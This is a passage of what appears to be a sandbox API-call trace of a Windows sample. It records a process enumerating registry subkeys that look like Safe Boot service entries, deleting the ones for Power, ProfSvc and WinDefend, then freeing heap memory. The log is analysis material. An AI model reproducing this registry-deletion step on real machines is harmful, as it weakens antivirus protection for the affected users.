Flags=0xc, Size=0x4e) returned 0x527048 [0085.538] GetProcessHeap () returned 0x510000 [0085.538] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526688 [0085.538] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.538] lstrlenW (lpString="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}") returned 38 [0085.538] GetProcessHeap () returned 0x510000 [0085.538] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5270b8 [0085.538] GetProcessHeap () returned 0x510000 [0085.538] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5266a8 [0085.538] GetProcessHeap () returned 0x510000 [0085.538] GetProcessHeap () returned 0x510000 [0085.539] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5261c8) returned 1 [0085.539] GetProcessHeap () returned 0x510000 [0085.539] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5261c8) returned 0x9e [0085.539] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5261c8 | out: hHeap=0x510000) returned 1 [0085.539] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AppInfo", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.539] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AppMgmt", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.540] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Base", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.540] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Boot Bus Extender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.540] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Boot file system", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.541] RegOpenKeyExW (in: hKey=0x78, lpSubKey="CryptSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.541] RegOpenKeyExW (in: hKey=0x78, lpSubKey="DcomLaunch", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.541] RegOpenKeyExW (in: hKey=0x78, lpSubKey="EFS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.542] RegOpenKeyExW (in: hKey=0x78, lpSubKey="EventLog", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.542] RegOpenKeyExW (in: hKey=0x78, lpSubKey="File system", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.542] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Filter", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.543] RegOpenKeyExW (in: hKey=0x78, lpSubKey="HelpSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.543] RegOpenKeyExW (in: hKey=0x78, lpSubKey="KeyIso", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.543] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Netlogon", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.544] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NTDS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.544] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PCI Configuration", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.545] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PlugPlay", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.545] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PNP Filter", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.545] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Power", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x7c) returned 0x0 [0085.545] RegQueryInfoKeyW (in: hKey=0x7c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f958, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f958*=0x0, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.546] RegCloseKey (hKey=0x7c) returned 0x0 [0085.546] RegDeleteKeyExW (hKey=0x78, lpSubKey="Power", samDesired=0x0, Reserved=0x0) returned 0x0 [0085.547] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Primary disk", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.547] RegOpenKeyExW (in: hKey=0x78, lpSubKey="ProfSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x7c) returned 0x0 [0085.547] RegQueryInfoKeyW (in: hKey=0x7c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f958, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f958*=0x0, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.547] RegCloseKey (hKey=0x7c) returned 0x0 [0085.547] RegDeleteKeyExW (hKey=0x78, lpSubKey="ProfSvc", samDesired=0x0, Reserved=0x0) returned 0x0 [0085.547] RegOpenKeyExW (in: hKey=0x78, lpSubKey="RpcEptMapper", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.548] RegOpenKeyExW (in: hKey=0x78, lpSubKey="RpcSs", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.548] RegOpenKeyExW (in: hKey=0x78, lpSubKey="sacsvr", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.548] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SCSI Class", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.548] RegOpenKeyExW (in: hKey=0x78, lpSubKey="sermouse.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.549] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SWPRV", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.549] RegOpenKeyExW (in: hKey=0x78, lpSubKey="System Bus Extender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.549] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TabletInputService", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.549] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TBS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.550] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TrustedInstaller", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.550] RegOpenKeyExW (in: hKey=0x78, lpSubKey="VDS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.550] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vga.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.551] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vgasave.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.551] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vmms", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.552] RegOpenKeyExW (in: hKey=0x78, lpSubKey="volmgr.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.552] RegOpenKeyExW (in: hKey=0x78, lpSubKey="volmgrx.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.552] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WinDefend", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x7c) returned 0x0 [0085.552] RegQueryInfoKeyW (in: hKey=0x7c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f958, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f958*=0x0, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.552] RegCloseKey (hKey=0x7c) returned 0x0 [0085.553] RegDeleteKeyExW (hKey=0x78, lpSubKey="WinDefend", samDesired=0x0, Reserved=0x0) returned 0x0 [0085.553] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WinMgmt", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.553] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfPf", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.554] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfRd", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.554] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.554] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{36FC9E60-C465-11CF-8056-444553540000}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.555] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E965-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.555] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E967-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.555] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E969-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.556] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96A-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.556] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96B-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.556] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96F-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.556] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E977-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.557] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E97B-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.557] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E97D-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.557] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E980-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.558] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{533C5B84-EC70-11D2-9505-00C04F79DEAF}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.558] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.558] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{71A27CDD-812A-11D0-BEC7-08002BE2092F}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.558] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.559] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.559] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.559] GetProcessHeap () returned 0x510000 [0085.560] GetProcessHeap () returned 0x510000 [0085.560] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525df8) returned 1 [0085.560] GetProcessHeap () returned 0x510000 [0085.560] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525df8) returned 0x10 [0085.560] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525df8 | out: hHeap=0x510000) returned 1 [0085.560] GetProcessHeap () returned 0x510000 [0085.560] GetProcessHeap () returned 0x510000 [0085.560] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5253e8) returned 1 [0085.560] GetProcessHeap () returned 0x510000 [0085.560] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5253e8) returned 0x14 [0085.560] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5253e8 | out: hHeap=0x510000) returned 1 [0085.560] GetProcessHeap () returned 0x510000 [0085.560] GetProcessHeap () returned 0x510000 [0085.560] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e10) returned 1 [0085.560] GetProcessHeap () returned 0x510000 [0085.560] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e10) returned 0x10 [0085.560] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e10 | out: hHeap=0x510000) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525408) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525408) returned 0x14 [0085.561] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525408 | out: hHeap=0x510000) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e28) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e28) returned 0xa [0085.561] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e28 | out: hHeap=0x510000) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525428) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525428) returned 0x14 [0085.561] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525428 | out: hHeap=0x510000) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525238) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525238) returned 0x24 [0085.561] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525238 | out: hHeap=0x510000) returned 1 [0085.561] GetProcessHeap () returned 0x510000 [0085.561] GetProcessHeap () returned 0x510000 [0085.562] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525448) returned 1 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525448) returned 0x14 [0085.562] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525448 | out: hHeap=0x510000) returned 1 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5250a8) returned 1 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5250a8) returned 0x22 [0085.562] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5250a8 | out: hHeap=0x510000) returned 1 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525468) returned 1 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525468) returned 0x14 [0085.562] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525468 | out: hHeap=0x510000) returned 1 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525488) returned 1 [0085.562] GetProcessHeap () returned 0x510000 [0085.562] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525488) returned 0x12 [0085.562] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525488 | out: hHeap=0x510000) returned 1 [0085.562] GetProcessHeap () returned 0x510000 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5254a8) returned 1 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5254a8) returned 0x14 [0085.563] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5254a8 | out: hHeap=0x510000) returned 1 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5254c8) returned 1 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5254c8) returned 0x16 [0085.563] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5254c8 | out: hHeap=0x510000) returned 1 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5254e8) returned 1 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5254e8) returned 0x14 [0085.563] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5254e8 | out: hHeap=0x510000) returned 1 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523ab8) returned 1 [0085.563] GetProcessHeap () returned 0x510000 [0085.563] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523ab8) returned 0x8 [0085.564] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x523ab8 | out: hHeap=0x510000) returned 1 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525508) returned 1 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525508) returned 0x14 [0085.564] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525508 | out: hHeap=0x510000) returned 1 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525528) returned 1 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525528) returned 0x12 [0085.564] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525528 | out: hHeap=0x510000) returned 1 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525548) returned 1 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525548) returned 0x14 [0085.564] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525548 | out: hHeap=0x510000) returned 1 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525568) returned 1 [0085.564] GetProcessHeap () returned 0x510000 [0085.564] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525568) returned 0x18 [0085.565] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525568 | out: hHeap=0x510000) returned 1 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525588) returned 1 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525588) returned 0x14 [0085.565] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525588 | out: hHeap=0x510000) returned 1 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e40) returned 1 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e40) returned 0xe [0085.565] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e40 | out: hHeap=0x510000) returned 1 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5255a8) returned 1 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5255a8) returned 0x14 [0085.565] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5255a8 | out: hHeap=0x510000) returned 1 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] GetProcessHeap () returned 0x510000 [0085.565] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e58) returned 1 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e58) returned 0x10 [0085.566] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e58 | out: hHeap=0x510000) returned 1 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5255c8) returned 1 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5255c8) returned 0x14 [0085.566] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5255c8 | out: hHeap=0x510000) returned 1 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e70) returned 1 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e70) returned 0xe [0085.566] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e70 | out: hHeap=0x510000) returned 1 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5255e8) returned 1 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5255e8) returned 0x14 [0085.566] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5255e8 | out: hHeap=0x510000) returned 1 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] GetProcessHeap () returned 0x510000 [0085.566] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525608) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525608) returned 0x12 [0085.567] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525608 | out: hHeap=0x510000) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525628) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525628) returned 0x14 [0085.567] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525628 | out: hHeap=0x510000) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] HeapValidate (hHeap=0x510000, 